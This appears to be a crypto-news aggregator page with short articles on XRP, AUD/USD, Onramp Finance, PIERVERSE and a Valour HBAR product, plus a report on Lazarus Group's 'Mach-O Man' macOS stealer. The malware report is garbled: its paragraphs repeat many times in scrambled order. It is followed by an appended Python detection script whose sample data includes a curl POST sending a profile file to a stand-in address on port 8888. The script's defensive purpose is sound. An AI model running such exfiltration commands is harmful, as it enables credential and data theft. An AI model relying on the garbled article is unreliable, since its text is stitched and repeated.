News
22 Apr 2026, 13:07
Can XRP score a 127% price jump? Analyst shares why XRP’s funding rate positioning could make this possible

An analyst is drawing attention to persistently negative funding rates for XRP on Binance as a potential precursor to a sharp price reversal, one that could deliver gains of up to 127% if historical patterns repeat. Since the start of 2026, funding rates on the exchange have remained negative for most of the period. Analyst
22 Apr 2026, 12:45
AUD/USD Analysis: BNY Reveals Critical Shift as Growth Index Softens While Capital Flows Turn Supportive

Financial markets are closely monitoring the Australian dollar against the US dollar as BNY Mellon’s latest analysis reveals a complex dynamic: while Australia’s growth index shows softening signals, supportive capital flows are creating unexpected resilience in the AUD/USD pair. This development comes amid shifting global monetary policies and commodity market volatility that continues to influence currency valuations worldwide.

AUD/USD Faces Diverging Economic Signals

BNY Mellon’s research team published their quarterly currency analysis this week, highlighting contradictory forces affecting the Australian dollar. The growth index, which measures multiple economic indicators, registered a decline of 0.8% in the latest quarter. However, capital flows into Australian assets increased by approximately 3.2% during the same period. This divergence creates what analysts describe as a “tug-of-war” scenario for the currency pair.

Market participants are particularly attentive to these developments because the Australian dollar serves as a proxy for global risk sentiment and commodity demand. The Reserve Bank of Australia’s monetary policy decisions continue to influence the currency’s trajectory. Furthermore, US Federal Reserve policies create additional pressure on the exchange rate through interest rate differentials.

Understanding the Growth Index Components

The growth index referenced by BNY incorporates several key metrics:

- Manufacturing PMI: Australia’s manufacturing sector showed contraction for the second consecutive month
- Retail Sales: Consumer spending growth slowed to 0.2% month-over-month
- Employment Data: Unemployment rate edged up to 4.1% despite job creation
- Business Confidence: Survey results indicated declining optimism among Australian firms

These indicators collectively suggest economic headwinds that typically pressure currency valuations. However, the Australian dollar has demonstrated remarkable stability against this backdrop. Market analysts attribute this resilience to structural factors within Australia’s economy and shifting global investment patterns.

Capital Flows Provide Unexpected Support

Despite softening growth indicators, capital flows tell a different story. Foreign investment in Australian government bonds reached $4.2 billion in the latest reporting period. Additionally, equity inflows totaled $1.8 billion, primarily targeting the mining and renewable energy sectors. These movements reflect continued international confidence in Australia’s long-term economic prospects.

The commodity sector remains a crucial driver of these capital flows. Australia’s position as a leading exporter of iron ore, lithium, and natural gas continues to attract investment. Global demand for these resources, particularly from Asian markets, supports the Australian dollar through trade balances and investment channels.

Recent AUD/USD Performance Indicators

Indicator                    Current Value   Previous Quarter   Year-over-Year Change
Exchange Rate                0.6580          0.6520             +0.9%
Trade Balance                +$7.4B          +$6.8B             +8.8%
Foreign Investment           +$6.0B          +$5.2B             +15.4%
Interest Rate Differential   -1.25%          -1.50%             Narrowing

Expert Perspectives on Currency Dynamics

Financial institutions are analyzing these developments through different lenses. BNY’s currency strategists emphasize that traditional growth indicators may not fully capture Australia’s economic transformation. The transition toward renewable energy exports and technology services creates new valuation metrics for the Australian dollar. Consequently, investors are increasingly looking beyond conventional economic data when making currency allocation decisions.

Meanwhile, other analysts point to technical factors supporting the AUD/USD pair. The currency’s correlation with copper prices remains strong at 0.72, while its relationship with gold prices has strengthened to 0.65. These commodity linkages provide natural support during periods of global uncertainty. Additionally, Australia’s fiscal position remains relatively strong compared to other developed economies, enhancing its appeal to international investors.

Global Context and Comparative Analysis

The AUD/USD dynamics occur within a broader global currency landscape. The US dollar index has shown volatility as markets assess Federal Reserve policy signals. Meanwhile, other commodity currencies like the Canadian dollar and New Zealand dollar face similar crosscurrents. Australia’s unique position in Asian supply chains and energy transitions creates distinct advantages for its currency.

Regional economic developments also influence the Australian dollar’s performance. China’s economic recovery pace directly impacts Australian exports, while Southeast Asian growth patterns affect investment flows. The relative stability of Australia’s political and regulatory environment continues to attract capital despite short-term economic softness. This structural advantage may explain the divergence between growth indicators and currency performance.

Risk Factors and Future Scenarios

Several risk factors could alter the current dynamics. A sharper-than-expected slowdown in China would negatively impact Australian exports. Additionally, renewed US dollar strength driven by Federal Reserve policy could pressure the AUD/USD pair. Domestic factors including housing market developments and consumer debt levels also warrant monitoring.

Market participants are preparing for multiple scenarios. The baseline projection suggests range-bound trading with support around 0.6500 and resistance near 0.6700. However, significant moves could occur if either growth indicators deteriorate further or capital flows accelerate unexpectedly. Technical analysis indicates key support levels at 0.6480 and 0.6420, while resistance appears at 0.6650 and 0.6720.

Conclusion

The AUD/USD currency pair presents a complex picture as BNY’s analysis reveals softening growth indicators alongside supportive capital flows. This divergence highlights the multidimensional nature of currency valuation in contemporary markets. While traditional economic metrics suggest headwinds for the Australian dollar, structural factors and investment patterns provide countervailing support. Market participants must consider both sets of factors when assessing the AUD/USD outlook. The currency’s performance will likely continue reflecting this tension between short-term economic data and long-term investment themes.

FAQs

Q1: What does BNY’s analysis reveal about the AUD/USD currency pair?
BNY’s analysis shows the Australian dollar faces conflicting signals: economic growth indicators are softening while capital flows into Australian assets remain supportive, creating a complex dynamic for the AUD/USD exchange rate.

Q2: Why are capital flows supporting the AUD despite softening growth?
Capital flows remain supportive due to Australia’s strong commodity export position, particularly in critical minerals and energy, along with relative political stability and attractive yield differentials compared to other developed markets.

Q3: How does the US Federal Reserve policy affect AUD/USD?
Federal Reserve policy influences AUD/USD through interest rate differentials, risk sentiment, and global dollar liquidity. Tighter US monetary policy typically pressures the Australian dollar, while easier policy provides support.

Q4: What are the main components of Australia’s growth index?
The growth index includes manufacturing PMI, retail sales data, employment figures, business confidence surveys, and other economic indicators that collectively measure economic expansion or contraction.

Q5: How do commodity prices influence the Australian dollar?
Commodity prices significantly influence the AUD because Australia is a major exporter of iron ore, coal, natural gas, and critical minerals. Higher commodity prices generally support the Australian dollar through improved trade balances and increased investment flows.

This post AUD/USD Analysis: BNY Reveals Critical Shift as Growth Index Softens While Capital Flows Turn Supportive first appeared on BitcoinWorld.
22 Apr 2026, 12:31
Onramp Launches New Bitcoin Finance Platform for BTC-Native Services

Onramp, the Austin-based bitcoin custody and advisory firm, launched Onramp Finance on April 21, 2026, a unified platform combining cash management, bitcoin brokerage across all 50 states, bitcoin IRAs, direct gold ownership, and a spending card into a single interface. The core question the launch raises: as institutional Bitcoin demand continues to accelerate, is the real infrastructure gap not custody or price exposure, but the fragmented financial rails surrounding long-term BTC holders?

Key Takeaways:

- Platform launch: Onramp Finance went live April 21, 2026, consolidating banking, brokerage, custody, and retirement into one interface.
- Yield and rewards: Cash accounts offer up to 5% rewards funded by Onramp; spending card returns up to 1.5% cash back.
- Custody infrastructure: Multi-provider model spans BitGo, Coinbase, Coincover, and Tetra, with insurance through Lloyd’s of London.
- Genesis Program: Capped at 210 participants; requires a minimum 2 BTC deposit and a qualifying trade of at least $100 within 30 days.
- Target market: Long-term wealth builders and high-net-worth individuals treating bitcoin as a multi-decade holding, not a speculative trade.

How Onramp Finance Actually Works – and What the Architecture Signals

The platform organizes its services around three functions: earning, accumulating, and spending. Users park cash in accounts earning up to 5% in Onramp-funded rewards, discretionary, not guaranteed interest, then route funds into bitcoin or gold, with cash-back rewards from the spending card redeployable into those same asset buckets. Custody sits on a multi-institution model spanning BitGo, Coinbase, Coincover, and Tetra, with Lloyd’s of London providing insurance coverage. That architecture eliminates single-point-of-failure risk that has historically plagued exchange-based custody, a direct structural response to the collapses that defined 2022.

“Two launches today. One lets you trade 24/7 perpetual futures on anything. One helps you earn on your cash, own bitcoin on the strongest custody architecture ever built, and preserve wealth across decades. The contrast is deafening. Speculation or savings. Pick your platform. https://t.co/3VgY0o12d0 pic.twitter.com/4FxOyOWyTP” — Michael Tanguma (@MTanguma) April 21, 2026

The Genesis Program layers early-adopter incentives on top: no-fee custody vault for one year, early product access, and direct contact with company leadership, all for a minimum 2 BTC deposit and a qualifying $100 trade within 30 days. Slots fill in trade-execution order, capped at 210 participants.

CEO Michael Tanguma framed the launch around long-horizon wealth principles rather than market timing. His position is unambiguous: “Sound financial planning has always rested on a few simple ideas. Live on less than you make. Put the rest into things that hold their value. Pass them on intelligently.” That framing matters – it signals Onramp is explicitly not competing for the active-trader segment.

The post Onramp Launches New Bitcoin Finance Platform for BTC-Native Services appeared first on Cryptonews.
22 Apr 2026, 12:14
North Korea’s Lazarus Group launches new malware kit targeting macOS users in crypto, fintech

The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. 
The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. 
The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. 
The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. 
The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. 
Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. 
In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. 
Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. 
The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. 
This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. 
The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. 
North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to target crypto companies, fintech organizations, and key executives who use Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks.
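Added example (not from the article or from the AnyRun analysis it cites): the indicators the article names, namely teamsSDK.bin, minst2.bin, com.onedrive.launcher.plist, ad hoc codesign use and curl POSTs to ports 8888 and 9999, turned into triage checks over process command lines and LaunchAgent files. The masquerade word list, the trusted path prefixes and every sample command, path and address below are constructed assumptions.

```python
import plistlib
import shlex
from urllib.parse import urlsplit

# Indicators named in the article.
STAGE_BINARIES = {"teamsSDK.bin", "minst2.bin"}
PERSISTENCE_PLIST = "com.onedrive.launcher.plist"
C2_PORTS = {8888, 9999}
# Assumption: loose match on the names the article says the agent poses as.
MASQUERADE_WORDS = ("onedrive", "antivirus")
# Assumption: locations where a genuine vendor agent keeps its executable.
TRUSTED_PREFIXES = ("/Applications/", "/Library/", "/System/", "/usr/")


def _port(arg):
    try:
        return urlsplit(arg).port if arg.startswith(("http://", "https://")) else None
    except ValueError:  # malformed host or port
        return None


def check_command(cmdline):
    """Return findings for one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv:
        return []
    findings, tool, args = [], argv[0].rsplit("/", 1)[-1], argv[1:]
    if tool in STAGE_BINARIES:
        findings.append(f"stage binary executed: {tool}")
    if tool == "codesign":
        # Ad hoc signing passes "-" as the identity: -s -, -fs -, --sign -
        for flag, value in zip(args, args[1:]):
            short = flag[:1] == "-" and flag[:2] != "--" and flag.endswith("s")
            if (short or flag == "--sign") and value == "-":
                findings.append("ad hoc signature applied with codesign")
    if tool == "curl":
        posts = "POST" in args or any(
            a in ("-d", "-F", "--form") or a.startswith("--data") for a in args)
        findings += [f"curl POST to port {_port(a)}: {a}"
                     for a in args if posts and _port(a) in C2_PORTS]
    return findings


def check_launch_agent(filename, plist_bytes):
    """Return findings for one LaunchAgent file (file name plus raw content)."""
    findings = []
    if filename == PERSISTENCE_PLIST:
        findings.append(f"file name matches {PERSISTENCE_PLIST}")
    try:
        job = plistlib.loads(plist_bytes)
    except Exception:  # not a valid XML or binary plist
        job = None
    if not isinstance(job, dict):
        return findings + ["plist could not be parsed as a job dictionary"]
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    program = str(args[0])
    identity = f"{job.get('Label', '')} {filename}".lower()
    poses = any(word in identity for word in MASQUERADE_WORDS)
    if poses and not program.startswith(TRUSTED_PREFIXES):
        findings.append(f"vendor-named agent runs binary outside app dirs: {program}")
    if program.rsplit("/", 1)[-1] in STAGE_BINARIES:
        findings.append(f"agent launches stage binary: {program}")
    return findings


# Constructed samples (not from the article or any real host).
SAMPLE_COMMANDS = [
    "/usr/bin/codesign --force --deep -s - /Users/alice/Downloads/Teams.app",
    "/usr/bin/curl -s -X POST -d @/tmp/profile.json http://203.0.113.7:8888/info",
    "/usr/bin/curl -fsSL https://example.com/index.html",
]
SAMPLE_AGENT = plistlib.dumps({"Label": "com.onedrive.launcher", "RunAtLoad": True,
                               "ProgramArguments": ["/Users/alice/.cache/minst2.bin"]})
BENIGN_AGENT = plistlib.dumps({"Label": "com.example.onedrive-helper", "RunAtLoad": True,
                               "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"]})


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(cmd, "->", check_command(cmd))
    print(PERSISTENCE_PLIST, "->", check_launch_agent(PERSISTENCE_PLIST, SAMPLE_AGENT))
```

File names and ports are cheap for an operator to change, so the path-versus-label mismatch in `check_launch_agent` is the check most likely to survive a rebuilt sample.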
22 Apr 2026, 12:13
Can the $100K PIERVERSE Binance competition spark recovery?

PIERVERSE (PIER) has seen sharp volatility over the past few days, transitioning from a strong rally into a correction before stabilising in a recovery range. The price swings followed market reaction to earlier speculation and the launch of a new trading competition. The token initially surged from $0.429 to a peak of $1.49, before reversing sharply. It has since stabilised around $0.9311, indicating a partial recovery after the pullback, though volatility remains elevated.

Sharp rally followed by aggressive correction

The first major move in PIERVERSE came when the token climbed rapidly from $0.429 to $1.49. The rally unfolded in a short timeframe and was driven by intense speculative inflows and its listing on Upbit, one of the largest cryptocurrency exchanges in South Korea. That listing triggered a significant repricing phase, culminating in an all-time high of $1.49 on April 20, 2026.

However, the move was short-lived. Once the price reached its peak, selling pressure increased sharply, leading to a near-full retracement of the advance. PIERVERSE dropped back toward the $0.69 region, effectively erasing most of the rally gains in a single corrective phase. This type of price action is typically seen when early buyers and short-term traders exit positions after a fast upward move, especially in markets where liquidity is concentrated around event-driven speculation rather than steady accumulation.

Despite the steep correction, the token did not continue lower for long. Bulls gradually returned to the market, helping stabilise the price near the $0.90 region, where it currently trades around $0.926.

$100K trading competition adds a second wave of activity

Binance Wallet has launched the Pieverse Protocol Trading Competition on Binance Alpha, and during the promotion periods, users can trade PIEVERSE in their Binance Wallet (Keyless) or via Binance Alpha to receive exclusive token rewards.

Since the competition began, trading volume has remained elevated, with daily activity exceeding $115 million at press time. This level of turnover reflects strong participation from traders responding to incentives rather than passive holding behaviour. The competition has helped prevent a deeper decline after the correction, instead pushing the market into a tighter consolidation range between approximately $0.86 and $0.98. While it has not created a new breakout, it has clearly increased liquidity and reduced downward pressure in the short term.

Market behaviour shows ongoing consolidation after volatility

The current price structure suggests that PIERVERSE is still working through a post-expansion stabilisation phase. After moving from $0.429 to $1.49, and then correcting sharply, the market is now attempting to form a temporary base above the $0.90 level. Trading activity remains elevated, but direction remains uncertain. Although the $100K competition has helped maintain liquidity, it has not been enough to establish a sustained upward trend.

The market is also being influenced by broader crypto conditions, particularly Bitcoin’s performance, which continues to affect liquidity flows into altcoins. In periods of Bitcoin strength, altcoins like PIERVERSE typically experience improved short-term momentum, while weakness tends to expose fragile support levels.

PIERVERSE price forecast

The key level to watch in the short term is $0.8630. This zone acts as the immediate support boundary for the current consolidation structure. As long as PIERVERSE holds above this level, the market may continue to stabilise and attempt a rebound. If support holds, the next upside targets are $0.99 and $1.08. A move through these levels would indicate improving short-term momentum and could allow the price to test $1.28, which remains a strong resistance area based on prior selling pressure.

On the downside, a clean breakdown below $0.8630 would shift focus toward $0.8456, which represents the next liquidity area where buyers may attempt to step in again. Continued weakness below that level would suggest that the post-rally correction phase is extending further.

The post Can the $100K PIERVERSE Binance competition spark recovery? appeared first on Invezz
22 Apr 2026, 12:00
Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange

Frankfurt, Germany – In a significant development for regulated cryptocurrency access, the Valour Hedera (HBAR) Exchange Traded Product (ETP) has secured a substantial $11 million institutional investment. This capital infusion, announced by Valour, a subsidiary of DeFi Technologies, demonstrates growing institutional confidence in the Hedera network. The investment specifically targets Valour’s HBAR ETP listed on the prestigious Börse Frankfurt. Consequently, this move signals a maturing phase for digital asset investment vehicles within traditional European finance.

Valour HBAR ETP Attracts Major Institutional Capital

The $11 million investment represents a clear vote of confidence from institutional investors. Specifically, $10 million flowed directly into the “Valour Hedera (HBAR) ETP” on the Börse Frankfurt. Additionally, $1 million entered the “Valour Hedera SEK” product on Sweden’s Spotlight Exchange. Valour executed these purchases at prevailing market prices. This strategic allocation highlights targeted interest in gaining regulated exposure to the Hedera Hashgraph ecosystem. Furthermore, it underscores the pivotal role of established stock exchanges in bridging digital and traditional assets.

Exchange Traded Products provide a familiar, regulated framework for investors. They eliminate the technical complexities of direct cryptocurrency custody. Valour’s ETPs track the underlying asset’s price, offering a seamless investment experience. The Börse Frankfurt, one of Europe’s largest trading venues, provides crucial liquidity and credibility. This listing therefore validates HBAR as an institutional-grade asset within a stringent regulatory environment.

Understanding the Hedera Hashgraph Ecosystem

Hedera Hashgraph is a public distributed ledger technology. It distinguishes itself through its unique hashgraph consensus algorithm. This system promises high throughput, low fees, and predictable network governance. The HBAR token serves as the network’s native cryptocurrency. It fuels transactions, secures the network, and enables governance participation. Major corporations, including Google, IBM, and Deutsche Telekom, govern the Hedera Council. This governance model aims to ensure stability and enterprise-grade reliability.

The network supports various decentralized applications (dApps). These span sectors like supply chain, payments, and digital identity. For instance, The Coupon Bureau uses Hedera for real-time retail coupon validation. Similarly, ServiceNow integrates Hedera for certified workflow documents. This enterprise-focused development pipeline provides fundamental utility for the HBAR token. Institutional investors likely assess this real-world adoption alongside pure market speculation.

